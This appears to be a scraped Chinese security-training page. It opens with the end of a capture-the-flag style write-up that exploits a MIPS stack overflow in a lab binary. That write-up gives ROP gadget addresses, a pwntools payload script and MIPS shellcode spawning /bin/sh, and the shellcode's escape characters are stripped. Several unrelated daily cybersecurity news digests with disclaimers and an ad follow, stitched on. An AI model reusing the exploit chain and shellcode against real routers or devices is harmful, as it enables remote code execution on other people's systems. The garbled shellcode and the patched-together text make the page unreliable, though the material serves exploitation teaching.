payload+="b"*0x58
payload+="cccc" #覆盖s0
payload+=p32(gadget3) #覆盖s1
payload+=p32(sleep)#覆盖s2,写入sleep
payload+=p32(gadget1)
payload+="c"*0x18 #gadget3需要调整的shellcode位置的字节码
payload+="aaaa"#覆盖$s0
payload+="aaaa"#覆盖$s1
payload+="aaaa"#覆盖$s2
payload+=p32(gadget4)#覆盖$ra
从ida显示的0x00016dd0可知,我们还得找一个可以利用$a0跳转的gadget5,直接简单粗暴 mipsrop.find("move $t9,$a0") gadget5=0x000214A0+libc_addr=0x7f7064a0
gadget1=0x7f714b10
gadget2=0x7f6eba50
gadget3=0x7f705f1c
gadget4=0x7f6fbdd0
gadget5=0x7f7064a0
sleep_addr=0x7f7142b0
payload="a"*508
payload+=p32(gadget2)
payload+="b"*0x58
payload+="cccc" #覆盖s0
payload+=p32(gadget3) #覆盖s1
payload+=p32(sleep)#覆盖s2,写入sleep
payload+=p32(gadget1)
payload+="c"*0x18 #gadget3需要调整的shellcode位置的字节码
payload+=p32(gadget5)#覆盖$s0
payload+="aaaa"#覆盖$s1
payload+="aaaa"#覆盖$s2
payload+=p32(gadget4)#覆盖$ra
payload+="f"*0x18
payload += p32(0xdeadbeef)
payload += shellcode
随便找了个网站生成了一段小端的shellcode
shellcode = “”
shellcode += "xffxffx06x28" # slti $a2, $zero, -1
shellcode += "x62x69x0fx3c" # lui $t7, 0x6962
shellcode += "x2fx2fxefx35" # ori $t7, $t7, 0x2f2f
shellcode += "xf4xffxafxaf" # sw $t7, -0xc($sp)
shellcode+= "x73x68x0ex3c" # lui $t6, 0x6873
shellcode += "x6ex2fxcex35" # ori $t6, $t6, 0x2f6e
shellcode += "xf8xffxaexaf" # sw $t6, -8($sp)
shellcode += "xfcxffxa0xaf" # sw $zero, -4($sp)
shellcode += "xf4xffxa4x27" # addiu $a0, $sp, -0xc
shellcode += "xffxffx05x28" # slti $a1, $zero, -1
shellcode += "xabx0fx02x24" # addiu;$v0, $zero, 0xfab
shellcode += "x0cx01x01x01" # syscall 0x40404
完整的payload
from pwn import *
context.binary = "./pwnable/ShellCode_Required/stack_bof_02"
context.arch = "mips"
context.endian = "little"
gadget1=0x7f714b10
gadget2=0x7f6eba50
gadget3=0x7f705f1c
gadget4=0x7f6fbdd0
gadget5=0x7f7064a0
sleep_addr=0x7f7142b0
shellcode = “”
shellcode += "xffxffx06x28" # slti $a2, $zero, -1
shellcode += "x62x69x0fx3c" # lui $t7, 0x6962
shellcode += "x2fx2fxefx35" # ori $t7, $t7, 0x2f2f
shellcode += "xf4xffxafxaf" # sw $t7, -0xc($sp)
shellcode+= "x73x68x0ex3c" # lui $t6, 0x6873
shellcode += "x6ex2fxcex35" # ori $t6, $t6, 0x2f6e
shellcode += "xf8xffxaexaf" # sw $t6, -8($sp)
shellcode += "xfcxffxa0xaf" # sw $zero, -4($sp)
shellcode += "xf4xffxa4x27" # addiu $a0, $sp, -0xc
shellcode += "xffxffx05x28" # slti $a1, $zero, -1
shellcode += "xabx0fx02x24" # addiu;$v0, $zero, 0xfab
shellcode += "x0cx01x01x01" # syscall 0x40404
payload="a"*508
payload+=p32(gadget2)
payload+="b"*0x58
payload+="cccc" #覆盖s0
payload+=p32(gadget3) #覆盖s1
payload+=p32(sleep)#覆盖s2,写入sleep
payload+=p32(gadget1)
payload+="c"*0x18 #gadget3需要调整的shellcode位置的字节码
payload+=p32(gadget5)#覆盖$s0
payload+="aaaa"#覆盖$s1
payload+="aaaa"#覆盖$s2
payload+=p32(gadget4)#覆盖$ra
payload+="f"*0x18
payload += p32(0xdeadbeef)
payload += shellcode
with open("stack_bof_02_pyload","w") as file:
file.write(payload)
这道题最重要的就是学到mipsrop链的构造。
网络安全日报 2025年04月21日
1、勒索软件使用被盗的AWS密钥攻击S3存储桶
https://hackread.com/mass-ransomware-campaign-s3-buckets-stolen-aws-keys/ 2025年4月17日,研究人员发现针对AWS云存储的大规模勒索攻击,攻击者利用1,229个被盗的AWS访问密钥对S3存储桶实施静默加密。通过滥用AWS服务端加密功能(SSE-C),攻击者使用自生成的AES-256密钥加密数据,且未触发常规告警或文件变更日志,使数据所有者难以察觉异常。此次攻击的AWS密钥或源于GitHub代码泄露、CI/CD工具配置缺陷及老旧IAM凭证,攻击流程高度自动化且身份不明。
2、关岛医院因勒索事件数据泄露被HIPAA罚款
https://www.govinfosecurity.com/guam-hospital-pays-feds-25k-to-settle-hipaa-investigation-a-28037 2025年4月17日,关岛纪念医院管理局(GMHA)因涉嫌违反《健康保险流通与责任法案》(HIPAA)与美国卫生与公众服务部民权办公室(HHS OCR)达成和解协议,支付2.5万美元罚款并执行整改计划。此次调查源于HHS OCR对两起安全事件的审查:2018年12月发生的勒索软件攻击事件导致5000人受保护健康信息泄露,以及2019年1月相关投诉中发现的违规行为。调查显示,该医院未按要求开展全面的安
3、Windows NTLM hash泄露漏洞被用于政府钓鱼攻击
https://www.bleepingcomputer.com/news/security/windows-ntlm-hash-leak-flaw-exploited-in-phishing-attacks-on-governments/ 2025年4月17日,微软在3月份修复了Windows系统中因.library-ms文件触发NTLM哈希泄露的漏洞(CVE-2025-24054),但该漏洞在补丁发布后迅速遭黑客利用。攻击者自3月20日起针对政府机构及私营企业发起钓鱼攻击,通过诱导目标访问恶意文件窃取NTLM认证哈希值,进而横向渗透内网。尽管攻击流量中检测到与俄罗斯APT28(Fancy
4、攻击者仿冒CapCut下载站传播远程控制程序
https://www.welivesecurity.com/en/scams/capcut-copycats-prowl/ 2025年4月17日,研究人员披露新型钓鱼攻击活动,攻击者仿冒CapCut、Adobe Express及Canva等AI内容生成工具,通过伪造“高级版”下载页面分发恶意远程控制程序。虚假网站诱导用户上传素材并下载名为“Creation_Made_By_CapCut.mp4”的可执行文件,实际为预配置的ConnectWise ScreenConnect、AnyDesk等工具,可在用户授权后直接控制设备,恶意远程工具可绕过管理员权限,实现数据窃取、勒索软件部署及横向渗透。
5、攻击者利用AI演示工具Gamma构建多阶段欺诈流程
https://thehackernews.com/2025/04/ai-powered-gamma-used-to-host-microsoft.html 2025年4月16日,Abnormal Security披露新型钓鱼攻击链,攻击者利用AI演示工具Gamma构建多阶段欺诈流程。攻击者通过钓鱼邮件投递含超链接的PDF附件,点击后跳转至Gamma平台仿造的“安全文档审阅”页面。受害者需通过Cloudflare验证码后进入伪造的Microsoft SharePoint登录界面,攻击者使用中间人(AiTM)技术实时校验凭证,若密码错误则触发动态提示以增强欺骗性。
6、勒索团伙伪造IT工具实施社工攻击
https://www.bleepingcomputer.com/news/security/interlock-ransomware-gang-pushes-fake-it-tools-in-clickfix-attacks/ 2025年4月18日,研究人员披露Interlock勒索团伙升级攻击手段,通过伪造IT支持工具实施ClickFix社会工程攻击。攻击者向企业员工发送“系统故障修复指南”,诱导其复制执行恶意PowerShell指令,成功渗透后,攻击者在FreeBSD服务器与Windows系统横向移动,部署自研勒索软件加密文件,勒索金额达数十万至数百万美元。
7、攻击者利用Zoom远程控制权限植入恶意软件
https://www.helpnetsecurity.com/2025/04/18/zoom-remote-control-attack/ 2025年4月18日,研究人员披露针对Zoom的攻击手法。攻击者利用视频会议平台的“远程控制”功能实施恶意操作,黑客通过伪造企业培训、客户支持等钓鱼会议链接,诱导用户点击“允许远程控制”权限。一旦授权,攻击者可直接在受害者设备执行命令,植入Agent Tesla、Remcos RAT等窃密木马,或劫持摄像头与麦克风进行数据窃取。
8、恶意npm包模仿Telegram Bot API在Linux上植SSH后门
https://thehackernews.com/2025/04/rogue-npm-packages-mimic-telegram-bot.html 2025年4月19日,研究人员披露,npm仓库中三个伪装成热门Telegram Bot API(Telegram机器人应用程序接口)的恶意软件包(node-telegram-utils、node-telegram-bots-api、node-telegram-util)被用于攻击Linux开发环境。这些软件包仿冒合法库node-telegram-bot-api,通过“星劫持”(starjacking)手段伪造GitHub仓库关联性,诱导开发
9、Gorilla安卓木马拦截并窃取短信验证码
https://cybersecuritynews.com/new-gorilla-android-malware-intercept-sms-messages/ 2025年4月19日,研究人员发现Android恶意程序“Gorilla”,该恶意程序通过拦截包含短信验证码(OTP)的SMS消息针对银行及Yandex用户发起攻击。该恶意程序通过精细化权限滥用与通信隐蔽技术,构建针对金融账户的OTP窃取链条。其利用WebSocket实时传输数据,并规避常规检测API的行为。Catalyst警告,此类攻击可能破坏多因素认证(MFA)安全性,直接威胁用户资金与隐私。
10、SonicWall SMA设备远程代码漏洞被恶意利用
https://securityaffairs.com/176706/security/attackers-exploited-sonicwall-sma-appliances-since-january-2025.html 2025年4月19日,研究人员披露,自1月起,攻击者持续利用SonicWall Secure Mobile Access(SMA)设备漏洞(CVE-2021-20035)实施入侵。该漏洞为SMA100管理界面的操作系统命令注入缺陷,允许远程认证攻击者以“nobody”用户权限执行任意代码,并可引发拒绝服务(DoS)攻击。研究发现,攻击者重点针对SMA 200/210/4
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年04月18日
1、APT组织利用GrapeLoader钓鱼攻击欧洲使馆
https://www.bleepingcomputer.com/news/security/midnight-blizzard-deploys-new-grapeloader-malware-in-embassy-phishing/ 2025年4月15日,研究人员揭露俄罗斯APT组织Midnight Blizzard(APT29/Cozy Bear)针对欧洲外交机构发起钓鱼攻击,其恶意软件GrapeLoader首次曝光。攻击自2025年1月起持续活跃,黑客伪造欧洲多国"外交部"名义发送主题为"品酒会邀请"的钓鱼邮件,诱导目标下载含恶意程序的ZIP压缩包。该压缩包内嵌合法PPT程序与恶意DL
2、朝鲜黑客借Python编程测试投递窃密程序
https://thehackernews.com/2025/04/crypto-developers-targeted-by-python.html 2025年4月15日,研究人员披露披露朝鲜黑客组织Slow Pisces(Jade Sleet)针对加密货币开发者发起精密供应链攻击。攻击者通过LinkedIn伪装招聘方,以"编程能力测试"为名诱骗开发者下载托管于GitHub的恶意Python项目。项目内嵌RN Loader加载器,通过YAML反序列化漏洞执行内存驻留攻击链,最终部署可窃取iCloud密钥、SSH凭证及云平台配置的RN Stealer窃密程序。攻击采用多阶段载荷触发机制,仅当
3、Node.js 恶意攻击瞄准加密货币用户
https://thehackernews.com/2025/04/nodejs-malware-campaign-targets-crypto.html 2025年4月17日,微软披露一起持续半年的恶意广告活动,攻击者利用Node.js框架伪造加密货币交易平台Binance及TradingView的安装程序,针对全球加密用户实施数据窃取。自2024年10月起,黑客通过仿冒网站诱导用户下载含恶意DLL文件的安装包,该组件通过Windows计划任务建立持久化机制,并利用PowerShell脚本绕过Microsoft Defender端点防护,窃取系统信息、硬件配置及应用程序数据。攻击链后期通过
4、上月修补的Windows NTLM 漏洞遭多起攻击活动利用
https://www.freebuf.com/articles/system/427892.html 微软上月已发布补丁的 Windows NTLM 哈希泄露漏洞 CVE-2025-24054,近期被威胁分子用于针对波兰和罗马尼亚政府及私营机构的攻击活动。Check Point 研究人员表示:"自 2025 年 3 月 19 日起已观测到该漏洞的野外活跃利用,攻击者可能借此泄露 NTLM 哈希或用户密码,进而入侵系统。"
5、苹果紧急修复两个已被利用的iOS漏洞
https://www.freebuf.com/news/427783.html 苹果公司已发布iOS 18.4.1和iPadOS 18.4.1更新,修复两个被用于针对特定iPhone用户实施高度定向、复杂攻击的关键零日漏洞。这两个漏洞存在于CoreAudio和RPAC组件中,攻击者可利用它们在受影响设备上执行任意代码或绕过安全保护机制。
6、Windows 11高危漏洞:300毫秒即可提权至管理员
https://www.freebuf.com/articles/427686.html Windows 11 存在一个严重漏洞,攻击者可在短短 300 毫秒内从低权限用户提升至系统管理员权限。该漏洞编号为 CVE-2025-24076,通过精密的 DLL 劫持技术利用 Windows 11“移动设备”功能的缺陷。安全研究人员于 2024 年 9 月发现此漏洞,并于 2025 年 4 月 15 日公开披露,其攻击目标是 Windows 11 摄像头功能加载的 DLL 文件。
7、研究人员成功揭露 Medusa 勒索软件组织的暗网服务器真实身份
https://www.freebuf.com/articles/427773.html 网络安全研究人员近日成功揭露了当今最臭名昭著的勒索软件运营服务器之一的真实身份。Medusa 勒索软件组织长期通过 Tor 隐藏服务保持相对匿名性,但研究人员通过利用其基础设施中的漏洞,成功破解了该组织的伪装。这一发现具有特殊意义,因为这是少数通过技术漏洞(而非操作安全失误)成功突破 Tor 网络匿名性保护的网络犯罪案例。
8、美国CISA紧急拨款维持CVE漏洞数据库运转
https://cybersecuritynews.com/cisa-provides-last-minute-support/ CISA紧急续签MITRE合同,确保CVE项目11个月资金支持,避免全球漏洞管理停摆风险。CVE基金会成立推动项目独立,解决单一政府资助的可持续性问题。CVE作为关键漏洞标识系统,中断将破坏安全公告、工具厂商和关键基础设施运作。
9、攻击者滥用AI平台仿冒微软登录 多阶段钓鱼攻击窃取实时凭证
https://cybersecuritynews.com/hackers-weaponize-gamma-tool-via-cloudflare-turnstile/ 网络安全专家发现攻击者利用AI工具Gamma发起多阶段钓鱼攻击,通过合法平台托管恶意内容窃取微软账户凭证。攻击链结合中间人技术,仿冒微软登录页面实时验证凭证并绕过多因素认证,凸显钓鱼攻击日益精密,需部署高级安全解决方案应对。
10、新型BPFDoor助力攻击者在Linux服务器中实现隐蔽横向移动
https://thehackernews.com/2025/04/new-bpfdoor-controller-enables-stealthy.html 网络安全研究人员发现Earth Bluecrow组织使用新型BPFDoor控制器组件攻击多国电信、金融及零售业,该Linux后门利用BPF技术绕过防火墙,通过密码验证实现隐蔽横向渗透,支持多协议控制并加密通信,威胁长期潜伏。专家呼吁加强BPF代码分析以防御此类攻击。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年04月17日
1、Storm-1811组织通过微软Teams聊天社工攻击金融领域
https://gbhackers.com/hackers-use-microsoft-teams-to-deliver-malware 2025年4月15日,研究人员披露一起针对金融及专业服务领域的高级供应链攻击。黑客通过伪造微软Teams内部IT支持账号,固定时间定向联系企业高管,诱骗其启动Windows快速协助工具(Quick Assist),进而部署基于TypeLib组件劫持的新型持久化恶意程序。攻击者篡改IE浏览器COM注册表项,使系统启动时自动执行托管于Google Drive的脚本,最终投放具备Telegram C2通信能力的PowerShell后门。
2、汽车租赁公司Hertz数据泄露影响多国客户
https://www.helpnetsecurity.com/2025/04/15/hertz-data-breach-customers-in-us-eu-uk-australia-and-canada-affected/ 2025年4月15日,美国汽车租赁巨头Hertz披露其因第三方服务商Cleo文件传输平台零日漏洞发生重大数据泄露,影响美国、欧盟、英国、加拿大及澳大利亚客户。泄露数据包括客户姓名、联系方式、出生日期、信用卡/驾照信息,部分用户社保号、护照、医疗及工伤索赔记录等敏感信息遭窃。尽管Hertz未公布总受影响人数,但仅美国缅因州已有3409名居民确认受害,推测全球规模较大。
3、SectopRAT通过伪造的恶意PDF转DOCX工具窃密
https://www.cloudsek.com/blog/byte-bandits-how-fake-pdf-converters-are-stealing-more-than-just-your-documents 2025年4月15日,研究人员披露一起针对全球用户的精密供应链攻击事件。黑客伪造PDFCandy.com界面,通过仿冒域名诱导用户下载恶意PDF转DOCX工具。受害者执行伪造工具时,会被诱骗运行恶意PowerShell指令,进而部署Arechclient2窃密木马(SectopRAT变种)。该恶意程序可窃取浏览器凭证、加密货币钱包、系统敏感文件等数据。安全团队溯源发现攻击者利
4、CVE漏洞数据库项目面临停摆危机
https://www.csoonline.com/article/3963190/cve-program-faces-swift-end-after-dhs-fails-to-renew-contract-leaving-security-flaw-tracking-in-limbo.html 美国国土安全部终止与MITRE的CVE漏洞数据库合同,25年网络安全基石面临崩塌。业界痛斥此举将破坏全球漏洞追踪体系,威胁防御生态。尽管CISA承诺缓解影响,私营领域或需紧急填补空缺,但过渡挑战巨大。政治预算削减或为主因,专家警告将引发连锁反应。
5、Chrome曝高危漏洞:攻击者可窃取数据并获取未授权访问权限
https://cybersecuritynews.com/critical-chrome-vulnerability-steal-data/ 谷歌紧急修复Chrome两个高危漏洞(CVE-2025-3619堆溢出和CVE-2025-3620释放后使用),攻击者可远程窃取密码、财务数据或控制设备。影响Windows/Mac 135.0.7049.95/.96前版本及Linux 135.0.7049.95前版本。用户需立即通过菜单"帮助关于"更新至最新版,未修补系统面临极高风险。
6、新型PasivRobber恶意软件窃取macOS系统与应用数据
https://cybersecuritynews.com/new-pasivrobber-malware-steals-data/ 复杂间谍软件"PasivRobber"针对macOS设备,专门窃取中国用户微信、QQ等通讯数据。采用高级混淆技术、多组件架构及28个插件,全面监控聊天记录、密码等敏感信息。其开发者疑与中国公司相关,建议更新系统并监控可疑活动以防范威胁。
7、Exchange 2016与2019版本将于六个月后终止支持
https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-2016-and-2019-reach-end-of-support-in-six-months/ 微软警告Exchange 2016/2019将于2025年10月14日终止支持,届时未升级的服务器将无法获取安全补丁,面临攻击风险。微软不提供延期支持方案,强烈建议用户立即升级。
8、WordPress热门插件SureTriggers曝高危漏洞,4小时内遭大规模利用
https://www.freebuf.com/articles/web/427574.html 2025年4月10日,热门WordPress插件SureTriggers曝出严重漏洞,在公开披露后仅四小时内就遭到攻击者大规模利用。该高危身份验证绕过漏洞影响1.0.78及之前所有版本,全球安装量超过10万次。攻击者可借此在未经验证的情况下,在受影响网站上创建管理员账户,可能导致整个网站沦陷。
9、4chan遭入侵?竞争对手Soyjak论坛黑客宣称泄露其源代码
https://www.freebuf.com/news/427639.html 知名图片论坛4chan正面临重大安全事件。在竞争对手Soyjak.st论坛用户宣称入侵该网站并泄露其源代码后,4chan目前处于宕机状态,相关调查仍在进行中。用户和研究人员发现,4chan定制化源代码(广为人知的Yotsuba系统)可能已遭泄露。颇具讽刺意味的是,攻击者自称与Soyjak.st有关联——这是一个知名度较低但与4chan存在竞争关系的图片论坛社区。
10、微软提醒Windows 11用户勿删除神秘的"inetpub"文件夹
https://www.freebuf.com/articles/system/427629.html 近期安全更新后在Windows系统上出现的一个看似空白的文件夹引发了用户担忧,微软证实这是有意为之的安全措施,不应被删除。该目录通常位于C:\inetpub,即使对于不运行Web服务器软件的用户,它也是修补最近漏洞的关键组件。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年04月16日
1、哈尔滨市公安局悬赏通缉3名美国NSA特工
https://mp.weixin.qq.com/s/E4ADnai-nWHLbvxG_RKZFA 2025年4月15日,记者从黑龙江省哈尔滨市公安局获悉,为依法严厉打击境外势力对我网络攻击窃密犯罪,切实维护国家网络空间安全和人民生命财产安全,哈尔滨市公安局决定对3名隶属于美国国家安全局(NSA)的犯罪嫌疑人凯瑟琳·威尔逊(Katheryn A. Wilson)、罗伯特·思内尔(Robert J. Snelling)、斯蒂芬·约翰逊(Stephen W. Johnson)进行通缉。因其和两所美国高校参与实施了针对亚冬会的网络攻击活动。
2、全球透析巨头DaVita遭勒索攻击致运营中断
https://www.govinfosecurity.com/ransomware-attack-disrupts-global-dialysis-provider-divita-a-27995 2025年4月14日,全球最大透析服务提供商DaVita披露,其网络系统因遭遇勒索软件攻击导致部分业务中断。攻击发生于4月12日,攻击者对该公司网络“特定组件”实施加密,迫使DaVita紧急隔离受感染系统并启用备份方案维持患者治疗。尽管该公司称已联合第三方安全团队调查并恢复服务,但尚无法评估事件持续周期及最终影响范围。
3、恶意软件ResolverRAT瞄准全球医疗制药行业
https://securityaffairs.com/176537/malware/new-malware-resolverrat-targets-healthcare-pharmaceutical-firms.html 2025年4月14日,研究人员披露一款名为“ResolverRAT”的新型远程访问木马自2024年3月10日起持续针对医疗及制药企业发起定向攻击。该恶意软件通过伪装为法律文件的钓鱼邮件传播,利用本地化语言诱骗用户下载恶意文件,并采用DLL侧加载触发感染。ResolverRAT与Rhadamanthys和Lumma RAT存在重叠,但因其独特的证书认证绕过、弹性C2架构及基
4、警惕!黑客出租可完全控制 macOS 系统的恶意软件
https://www.freebuf.com/articles/endpoint/427563.html 网络安全领域出现了一种针对苹果用户的新型威胁。地下论坛上正在宣传一款名为"iNARi Loader"的macOS恶意软件即服务(MaaS)产品。这款高价窃密软件代表了macOS专用恶意软件的惊人进化,它结合了远程桌面功能和高级数据窃取技术。据网络安全新闻观察到的暗网帖子显示,iNARi Loader背后的威胁行为者提供的这款私有macOS窃密软件具有超越以往类似恶意软件的广泛功能集。
5、Meta将恢复使用欧洲用户公开内容训练AI模型
https://www.bleepingcomputer.com/news/technology/meta-to-resume-ai-training-on-content-shared-by-europeans/ Meta将使用欧洲成年用户在Facebook和Instagram的公开内容训练AI模型,不包括私密对话及未成年人数据。用户可通过表单反对数据使用。欧盟监管机构批准该计划,认为其符合隐私法规。Meta强调此举将提升AI对欧洲文化的理解,同时尊重用户选择权。
6、美国DHS终止资助,CVE漏洞数据库项目面临停摆危机
https://www.freebuf.com/articles/network/427648.html 美国非营利研发组织MITRE宣布,其与美国国土安全部(DHS)签订的"通用漏洞披露(CVE)"数据库维护合同将于2025年4月16日午夜到期。这个运行25年的项目作为网络安全防御体系的核心支柱,因DHS未说明具体原因拒绝续约而面临终止。
7、微软警告:WinServer 2025 重启可能导致部分域控制器连接中断
https://www.freebuf.com/articles/system/427472.html 微软近日向IT管理员发出警告,部分Windows Server 2025域控制器(Domain Controllers,简称DC)在重启后可能无法访问,导致相关应用和服务出现故障或无法连接。微软解释称,该问题源于服务器重启后错误加载了标准防火墙配置文件,而非域防火墙配置文件。"运行Active Directory域控制器角色的Windows Server 2025服务器在重启后可能出现网络流量管理异常,"微软在周五的Windows版本健康仪表盘更新中表示。
8、廉价安卓手机预装恶意软件 通过伪造WhatsApp窃取加密货币
https://hackread.com/pre-installed-malware-cheap-android-phones-crypto-fake-whatsapp/ 廉价安卓手机预装恶意软件,通过伪造WhatsApp等应用劫持加密货币交易,替换钱包地址窃取资金。攻击发生在生产阶段,涉及中国小型品牌。恶意软件还扫描设备获取助记词,涉案金额巨大。建议避免购买来源不明设备,勿存敏感信息为图片,使用官方应用商店。
9、技术服务商Conduent确认客户数据遭窃取
https://www.bleepingcomputer.com/news/security/govtech-giant-conduent-confirms-client-data-stolen-in-january-cyberattack/ 2025年4月14日,技术服务商Conduent确认其1月遭受的网络攻击导致客户数据外泄。该公司为全球超600家政府及运输机构提供数字平台服务,此次事件中攻击者窃取的文件包含客户终端用户的个人敏感信息。Conduent表示,因数据复杂性已聘请网络安全数据挖掘专家评估泄露内容,初步确认涉及大量个人数据,但尚未发现暗网流通痕迹。
10、攻击者通过实时邮箱验证机制实施定向窃密
https://thehackernews.com/2025/04/phishing-campaigns-use-real-time-checks.html 2025年4月15日,研究人员披露,攻击者正采用“精准验证钓鱼”技术提升攻击效率。攻击者通过实时邮箱验证机制实施精准定向窃密。攻击者通过在钓鱼工具包中集成API或JavaScript验证服务,实时核验受害者输入的邮箱是否存在于其预先获取的高价值账户库中。仅当邮箱通过验证时,才会展示伪造的登录页面窃取凭证;若未匹配,则跳转至维基百科等无害页面以规避安全分析。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年04月15日
1、RansomHub勒索团伙对全球84家机构发起攻击
https://cybersecuritynews.com/ransomhub-ransomware-group-compromised-84-organization/ 2025年4月13日,勒索组织RansomHub对全球84家机构发起攻击,成为三月最活跃的勒索团伙,攻击主要针对欧美地区的制造、医疗及金融行业。RansomHub定制的Betruger后门通过模块化设计实现凭证提取、内网侦察与C2通信功能集成,较传统分阶段攻击减少75%的IoC暴露风险;攻击链优先利用未修复的VPN及RDP漏洞,结合合法系统工具进行提权操作;基础设施采用动态IP池及加密代理链规避封锁。
2、南非电信巨头Cell C遭黑客组织数据勒索
https://securityaffairs.com/176509/data-breach/south-african-telecom-provider-cell-c-disclosed-a-data-breach.html 2025年4月14日,南非第四大电信运营商Cell C确认其2024年遭RansomHouse团伙网络攻击,导致2TB用户敏感数据泄露。攻击者通过未授权访问窃取包括姓名、身份证号、银行账户、医疗记录及护照详情等数据,并在暗网公开施压。Cell C已启动应急响应,联合网络安全专家加固系统,通报监管机构,并向受影响用户提供反钓鱼和信用保护指南。
3、Chrome 136修复存在20年的历史记录泄露漏洞
https://www.bleepingcomputer.com/news/security/chrome-136-fixes-20-year-browser-history-privacy-risk/ 2025年4月13日,谷歌发布Chrome 136版本,修复存在20年的浏览器历史隐私漏洞。该漏洞允许网站通过CSS的:visited伪类检测用户历史访问记录,攻击者可结合定时、像素追踪等技术推断用户浏览行为,导致钓鱼攻击与用户画像风险。新版采用"三重密钥分区"机制,将访问记录按链接URL、顶级域名及框架来源隔离,确保历史状态仅在同源页面生效。谷歌保留同站内已访问链接的视觉提示以维持用户体验
4、iOS设备遭受钓鱼攻击的频率是Android设备的两倍
https://www.helpnetsecurity.com/2025/04/11/mobile-cybersecurity-challenges/ 鉴于复杂恶意软件的增多、国家资助移动恶意软件的发展、大量iOS零日漏洞的出现以及对移动社交工程的严重依赖,移动设备安全现在必须成为安全团队的首要任务。
5、甲骨文承认"淘汰服务器"遭入侵 坚称核心云平台未受影响
https://www.csoonline.com/article/3959636/oracle-admits-breach-of-obsolete-servers-denies-main-cloud-platform-affected.html 甲骨文声称,事件仅涉及"两台淘汰服务器",与OCI或任何客户云环境无关,并着重强调没有OCI客户数据被查看或窃取,OCI服务也未受到任何形式的中断或破坏。
6、Foxmail邮件客户端存在跨站脚本攻击漏洞
https://mp.weixin.qq.com/s/2spz-3jU7Sk15G44EuA9qg 攻击者利用该漏洞作为攻击入口,向目标用户对象发送包含恶意代码的电子邮件,用户仅浏览邮件即被植入木马,其主机终端即被控。
7、npm恶意软件瞄准Atomic与Exodus钱包
https://hackread.com/npm-malware-atomic-exodus-wallets-hijack-crypto/ 网络安全公司ReversingLabs发现名为"pdf-to-office"的恶意npm软件包,该程序会静默篡改Atomic和Exodus加密货币钱包的本地文件,通过替换收款地址劫持交易。
8、俄罗斯APT组织利用设备码钓鱼技术绕过多因素认证
https://cybersecuritynews.com/russian-apt-hackers-using-device-code-phishing/ 俄罗斯国家支持的APT组织Storm-2372近期发起了一场复杂的网络攻击活动,利用设备码钓鱼(Device Code Phishing)技术绕过多因素认证(MFA)安全措施。
9、思科设备曝出七年旧漏洞 攻击者可远程执行代码
https://www.freebuf.com/articles/network/427372.html 思科网络设备中存在一个长达七年的安全漏洞,至今仍对未打补丁的系统构成重大风险,攻击者可利用该漏洞远程执行代码。该漏洞编号为CVE-2018-0171,最初于2018年发现,针对思科的Smart Install(智能安装)功能。该功能是一种即插即用配置工具,旨在简化网络设备部署。
10、OWASP发布生成式AI安全治理清单
https://www.freebuf.com/articles/ai-security/427411.html 随着OpenAI、Anthropic、Google和微软等公司的生成式AI及大语言模型(LLM)用户量呈指数级增长,企业IT安全决策者正努力跟上AI技术的快速发展步伐。非营利组织OWASP最新发布的《LLM AI网络安全与治理清单》(PDF)正是为此而生。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

